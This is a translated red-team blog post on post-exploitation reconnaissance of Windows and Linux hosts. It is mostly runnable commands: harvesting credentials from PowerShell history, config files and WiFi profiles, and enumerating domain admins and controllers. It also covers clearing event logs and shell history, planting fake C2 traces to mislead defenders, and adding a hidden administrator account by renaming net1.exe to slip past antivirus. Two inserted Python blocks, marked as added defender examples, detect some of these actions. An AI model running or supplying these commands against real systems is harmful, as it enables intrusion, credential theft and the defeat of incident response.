preface

This article is only used for exchange and learning. Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and the author of this article shall not assume any responsibility.

Host Information Collection

Windows host information collection

History of Powershell commands

You can view this using Powershell

powershell Get-Content (Get-PSReadlineOption).HistorySavePath

In some cases this command does not work. You can then use dir to find the PowerShell history file and type to read it:

%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
%appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt


PS: When you encounter a file download vulnerability in a Windows environment, you can download the following file to browse for sensitive information. Some o&M staff use PowerShell to manage workgroup or domain machines. If you are lucky, you can find SSH or database login passwords or other important files, especially o&M scripts, which mostly consist of host addresses and login passwords. The absolute paths of these scripts can be found in the PowerShell history, and the scripts can then be read through the file download vulnerability, which is also a great breakthrough. Most of these history commands also contain host information from which IP addresses can be extracted, broadening our attack surface.

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Those who are in a hurry to trace an intrusion can also take a look at this file and may find some clues.

At the end of a penetration, if you have used PowerShell, you must clear the PowerShell command history, which reduces the probability of successful tracing to a certain extent. Of course, you can also confuse the blue team by writing some strange commands, such as changing the C2 address to an overseas mining IP with public IOC information, digging a hole and throwing in a few samples, to mislead the tracers into wasting energy. When faking traces, remember to change the file times and pay attention to details such as the language: if the blue team sees Chinese file names, wrong grammar or inconsistent times, especially in an offensive and defensive drill, they will know at first sight that it is fake. If there is a traffic audit device such as an IDS on the Intranet, the blue team can check the device traffic, which may expose us.

Clear the history of Powershell commands

powershell Remove-Item (Get-PSReadlineOption).HistorySavePath

View history open files

This directory contains the history of files opened on the computer: which files, when, even clicks on each disk are recorded in great detail. We can use this directory to locate the folders and files the o&M staff commonly use and find sensitive information; checking this directory often has a magic effect. Many o&M staff like to record the credentials of each machine for convenience; after all, one administrator managing dozens of machines is very common, and that many passwords cannot all be remembered, so most of them record the machine credentials in TXT or XLS files, which gives us an opportunity. In fact, what I encountered most in this directory were daily and weekly reports written by o&M staff. In most cases these reports contained a large amount of server information, so we could move further across the Intranet through it.

recent

Most of the time our starting point is webshell permissions. If you cannot determine whether the administrator is online or whether there is a traffic detection device such as an IDS, it is best not to go to the remote desktop at first, otherwise it is not worth the loss. In this case, we can use dir to read the history of opened files, and then use dir to search for keywords to get the absolute path of the file, so that we can view it directly in the webshell or download it back to local and open it.

dir %APPDATA%\Microsoft\Windows\Recent
dir C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent
dir /a /s /b c:\password.txt

Other commonly used keyword searches:

dir /a /s /b c:\*.conf *.ini *.inc *.config
dir /a /s /b c:\conf.* config.*
dir /a /s /b c:\*.txt *.xls *.xlsx *.docx
findstr /s /i /n /d:C:\ /c:"pass" *.config

If too much content is displayed, you can search for these keywords one by one or use findstr to filter them, for example:

dir /a /s /b c:\*.conf *.ini *.inc *.config | findstr "operations"
dir /a /s /b c:\*.txt *.xls *.xlsx *.docx | findstr "password"

In addition, you can flip through the recycle bin, where there are often a lot of surprises.

Files uploaded to the target machine, such as NPS, mimikatz, psexec, etc., also generate records in the recent directory. To better hide traces, we can run the rd command to delete the record, or directly use the file management function provided by CS or the webshell management tool to delete it. In addition, after psexec logs in successfully and exits, Events 4624, 4628 and 4634 are generated in the security log of the target machine, and Event 7045 (recording the PSEXESVC installation) and Event 7036 (recording the PSEXESVC service status) are generated in the system log. Windows logs also need to be processed. The recent directory will be empty or have very few items in it only if someone has manually cleaned it or used some security tool to clean it.

rd /s file

Windows Log path:

Security log:     %SystemRoot%\System32\Winevt\Logs\Security.evtx
System log:       %SystemRoot%\System32\Winevt\Logs\System.evtx
Application log:  %SystemRoot%\System32\Winevt\Logs\Application.evtx
Registry key for the logs: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog
Default IIS log location:  %SystemDrive%\inetpub\logs\LogFiles\W3SVC1\

Powershell clears Windows event logs

PowerShell -Command "& {Clear-EventLog -Log Application,System,Security}"
Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.LogName}

PS: If an uploaded file cannot be deleted (no permission or other reasons), you can upload or create a new file with the same name to overwrite the original file.
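As an added defender-side example, not part of the original post, the following Python correlates the events named above on constructed sample records: a network logon (4624, logon type 3) followed within a short window by the PSEXESVC service installation (7045). It also looks for Security event 1102, which Windows writes when the Security log is cleared (for example by the Clear-EventLog commands above); the record layout, field names and sample values are assumptions for this example.

```python
# Added example: correlate psexec-related events on constructed records.
from datetime import datetime, timedelta

# Constructed sample records, not real logs. "data" mirrors a few
# EventData fields of the real events; all values are made up.
SAMPLE_EVENTS = [
    {"time": "2024-01-10 09:00:01", "log": "Security", "id": 4624,
     "data": {"LogonType": "3", "TargetUserName": "administrator",
              "IpAddress": "10.10.10.5"}},
    {"time": "2024-01-10 09:00:03", "log": "System", "id": 7045,
     "data": {"ServiceName": "PSEXESVC",
              "ImagePath": "%SystemRoot%\\PSEXESVC.exe"}},
    {"time": "2024-01-10 09:00:40", "log": "Security", "id": 4634,
     "data": {"TargetUserName": "administrator"}},
    {"time": "2024-01-10 09:30:00", "log": "Security", "id": 1102,
     "data": {"SubjectUserName": "administrator"}},
    {"time": "2024-01-10 11:00:00", "log": "System", "id": 7045,
     "data": {"ServiceName": "Backup Agent",
              "ImagePath": "C:\\Program Files\\Backup\\agent.exe"}},
]

def _ts(ev):
    return datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")

def find_psexec_sessions(events, window_seconds=60):
    """Return (user, source_ip, install_time) for every PSEXESVC service
    install (7045) preceded within the window by a type-3 logon (4624)."""
    logons = [e for e in events
              if e["id"] == 4624 and e["data"].get("LogonType") == "3"]
    hits = []
    for ev in events:
        if ev["id"] != 7045 or ev["data"].get("ServiceName", "").upper() != "PSEXESVC":
            continue
        for lo in logons:
            delta = _ts(ev) - _ts(lo)
            if timedelta(0) <= delta <= timedelta(seconds=window_seconds):
                hits.append((lo["data"]["TargetUserName"],
                             lo["data"]["IpAddress"], ev["time"]))
                break
    return hits

def find_log_clearing(events):
    """Security event 1102 is written when the Security log is cleared
    (e.g. by Clear-EventLog or wevtutil cl) and survives the clearing."""
    return [(e["time"], e["data"].get("SubjectUserName", "?"))
            for e in events if e["log"] == "Security" and e["id"] == 1102]

if __name__ == "__main__":
    for user, ip, when in find_psexec_sessions(SAMPLE_EVENTS):
        print(f"PSEXESVC installed at {when} after network logon by {user} from {ip}")
    for when, user in find_log_clearing(SAMPLE_EVENTS):
        print(f"Security log cleared at {when} by {user}")
```

On a real host the same logic runs over records exported with wevtutil or Get-WinEvent; forwarding the logs off the machine is what keeps the 1102 record useful after a clear.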

Search for sensitive files

  • Configuration files such as servers, middleware, and databases.
  • Operation and maintenance of passwords, work records, personal records and so on.
  • Company documents, contracts, network topology, that sort of thing.

We all know the importance of configuration files for servers, middleware and databases. If a configuration file containing a large amount of sensitive information is obtained during a penetration, it paves the way for the subsequent steps, as in the following case:

In a certain project, I got a shell on the Intranet and, through host information collection, found that a configuration file, config-back.xml, contained a large number of database accounts and passwords. I then used CS to download the configuration file to local, set up a proxy and used these accounts and passwords to go after MSSQL hosts in batches. Combining these passwords into a high-quality dictionary for brute forcing the C segment, it took less than 30 minutes to get permissions on more than 200 machines. So the essence of penetration is information gathering, and the amount of information gathered determines what our penetration finds. There is not much more to say about finding configuration files; refer to the dir commands above.

dir /a /s /b d:\conf.* config.*

In addition, pay more attention to the files stored by the web system itself. I once met an IBM system with a cloud disk function; after going through that module I found folders created by o&M staff containing a large amount of data: network topology, operation logs, even passwords. During another drill I reached the o&M machine, and there were a lot of equipment lists on the desktop as well as account passwords of various systems; these XLSX forms were not encrypted and could be opened and viewed directly. Some o&M staff, for convenience, often create very serious security risks, giving intruders a great opportunity.

Here I would like to add a point about WiFi password acquisition. When penetrating the Intranet, the more passwords obtained, the easier the road will be. In many cases the passwords on the Intranet are reused, and even if not, most of them follow a pattern.

netsh wlan show profiles
netsh wlan show profiles name="WiFi name" key=clear

Obtain all WiFi passwords through a for loop:

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

If you already have administrator rights on the current machine, you can run credential retrieval tools such as mimikatz and procdump to obtain system credentials, since most administrators use the same or a patterned password to manage multiple servers. If you get the host password or hash, you can try PTH or psexec in batches. During collection, also pay attention to whether there are domain-related processes: if a domain administrator has logged in to a machine we have permission on, we can use it for lateral movement in the domain; if not, look at MS14-068 and similar. These are all basic common sense after getting in, so there is not much more to say.

Common commands for collecting domain information

Common commands

net use                                     View IPC connections
net user /domain                            Obtain the domain user list
net user test 123 /add                      Add a user
net localgroup administrators test /add     Add the test user to the administrators group
net group /domain                           Query the groups in the domain
net group "domain admins" /domain           Obtain the domain administrator list
net group "enterprise admins" /domain       View the enterprise administrators group of the current domain
net group "domain computers" /domain        View the names of all computers in the current domain
net group "Exchange Servers" /domain        Check whether there are Exchange servers
net group "domain controllers" /domain      Check whether there are domain controllers
net config workstation                      Check the current login domain
net view                                    Check the list of machines in the same domain
net view \\IP                               View the shares of IP
net view \\test                             View the list of shared resources on the test computer
net view /domain                            View the number of domains on the Intranet
setspn -t target.com -q */*                 Query the SPNs registered in the domain
for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "TTL"
for /l %i in (1,1,255) do @ping 10.10.10.%i -w 1 -n 1 | find /i "TTL"

Network information search

ipconfig /all    Displays the host name, IP address, DNS and other information of the current host
route print      Displays the routing table
netstat -ano     Displays the open ports

When looking for the internal network segments, it is recommended to combine passive and active searches. If the movement is too large, such as with nmap or nbtscan, the live machines in the whole segment may come out with one sweep, but then comes the IDS traffic audit. Once traffic anomalies are detected by the blue team, it may lead to the loss of our access. With a blue team that has all kinds of security equipment, Intranet penetration must be careful; large-scale asset scanning and automated vulnerability scanning I usually save for last.

Positioning the domain control

View the domain time. Generally, the domain controller functions as the time server.

net time /domain

Locate a domain controller using DNS

ipconfig /all
ipconfig /displaydns     Sometimes the domain controller information can be obtained from the DNS cache

Use netdom to obtain the domain controller list and the domain controller name; you can then ping the domain controller to get its IP address.

netdom query dc

Other Information Search

systeminfo                                   View the patch status
net group "domain controllers" /domain       Query the domain controllers
nslookup -type=SRV _ldap._tcp.corp           Obtain the domain controller address from the SRV record
nltest /dclist:corp                          Use nltest to query the domain controller list
tasklist /svc                                Check processes and the corresponding service names
cmdkey /l                                    Check the saved login credentials
type C:\Windows\System32\drivers\etc\hosts   May reveal some Intranet IP addresses

Other supplementary

Web log

Some old systems use GET with plaintext parameters to transmit the backend login account and password, so we can check the web logs for a possible harvest. In addition, pay attention to the logs of the system itself, which often contain Intranet IP segments and even accounts and passwords.

In addition, look for FTP. Many times Intranet FTP allows unauthorized access, and even if there is a password, most are weak, patterned or universal passwords; whether we can log in successfully depends on the depth of our information collection. FTP mostly contains department or company sensitive files, so pay more attention to it.

Use net1.exe to bypass AV when adding users

In a Windows environment, adding users during a penetration is often blocked by AV and also generates alarm logs. At this time you can use net1.exe to bypass the AV and add users; of course, you can also use CS's own argue parameter pollution to add users.

net1.exe

cd c:\windows\system32
copy net1.exe svchost.txt
svchost.txt user svchost M@Bas#as#@123 /add
net localgroup administrators svchost /add
svchost.txt user svchost M@Bas#as#@123 /add & net localgroup administrators svchost /add

Argue parameter pollution

argue net1 aaaaaaaaaaaaaaaaaaaaaaaassssssssssssssssssssssssssssssssssssssssssssssssss
execute net1 user svchost M@Bas#as#@123 /add
execute net1 localgroup administrators svchost /add

Adding users with the normal net command is blocked by Huorong AV.

Deleting the user: Huorong also has no perception of it.

Add a user to the administrator group

m1kh.txt user m1kh M@Bas#as#@123 /add & net localgroup administrators m1kh /add
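As an added defender-side example, not part of the original post, the following Python finds byte-identical copies of a reference binary stored under another name, which is exactly what "copy net1.exe svchost.txt" above produces. The reference binary and the scanned directory are constructed temporary files for the example, not the real System32.

```python
# Added example: detect renamed copies of built-in binaries by content hash.
import hashlib
import os
import tempfile

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def find_renamed_copies(reference_paths, scan_dir):
    """Return sorted (found_path, original_name) pairs for files under scan_dir
    whose hash equals one of the reference binaries but whose name differs."""
    known = {sha256_of(p): os.path.basename(p).lower() for p in reference_paths}
    hits = []
    for root, _, files in os.walk(scan_dir):
        for name in files:
            path = os.path.join(root, name)
            orig = known.get(sha256_of(path))
            if orig and name.lower() != orig:
                hits.append((path, orig))
    return sorted(hits)

def demo():
    """Constructed scenario: a stand-in net1.exe, a renamed copy (svchost.txt),
    an untouched copy under its own name, and an unrelated text file."""
    sysdir = tempfile.mkdtemp(prefix="fake_system32_")
    scan = tempfile.mkdtemp(prefix="scan_")
    stand_in = b"MZ" + b"\x90" * 64          # constructed bytes, not the real binary
    fake_net1 = os.path.join(sysdir, "net1.exe")
    with open(fake_net1, "wb") as f:
        f.write(stand_in)
    with open(os.path.join(scan, "svchost.txt"), "wb") as f:
        f.write(stand_in)                     # same bytes under a harmless-looking name
    with open(os.path.join(scan, "net1.exe"), "wb") as f:
        f.write(stand_in)                     # same name: not a rename, ignored
    with open(os.path.join(scan, "notes.txt"), "w") as f:
        f.write("weekly report\n")            # unrelated file, no hash match
    return [(os.path.basename(p), orig) for p, orig in find_renamed_copies([fake_net1], scan)]

if __name__ == "__main__":
    for name, orig in demo():
        print(f"{name} is a renamed copy of {orig}")
```

Hash matching only catches byte-identical copies; checking the original file name in the PE version resource is the usual complement on a real host.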

Linux host information collection

Network Information Collection

last                                              Most o&M staff access the Intranet and log in to the system, so some Intranet IP addresses can be obtained here and the Intranet IP segment can be mapped
ifconfig -a / arp -a / netstat -anopt / ss -nt    Provide certain information about the Intranet network topology
iptables                                          The iptables firewall sometimes has Intranet traffic rules and provides certain information
...

Collection of Sensitive Documents

grep "password:" * -Rn
find / -name "config.*"
find / -name "databases.*"
find / -name "config.*" | xargs grep "password"

Other supplementary

  • history

History is very useful for Linux penetration; all kinds of connection passwords (SSH, MySQL, FTP, etc.) may be in it, so it is the first file to look at once you have permissions.

  • The database

After getting database access, in addition to collecting account passwords, also search the logs and login records to see whether there are other IP network assets. I have encountered several sites sharing one MySQL database that recorded the backend account passwords of multiple systems; we can use these account passwords to log in to the other systems, and if we encounter backend file upload or RCE there, we may be able to bring another host online and gain one more Intranet stronghold.

  • The log

We need to pay more attention to logs; collecting account passwords will be helpful for the subsequent penetration. Of course, most of the time we need webshell permission to view logs; at this point we can scan the directory to find the log, or combine with Spring Boot httptrace.

Now about the log records in the database: some databases have a log recording function that records the user login IP. After taking down the database permission, you can find these records and maybe get another Intranet IP segment, increasing our lateral attack surface.

The rest are SSH private keys and operation and maintenance scripts. Ultimately, information collection depends on the target scenario.

summary

The above is just some personal opinion, partial and incomplete. I think we need to improvise: solving the same problem in the same way day after day makes thinking ossified, which leads us to stop looking carefully and thinking carefully when we penetrate, and rigid thinking tends to make us miss good opportunities. In the process of attack and defense, in addition to maintaining a good mentality and clear thinking, we must also keep thinking to avoid mistakes.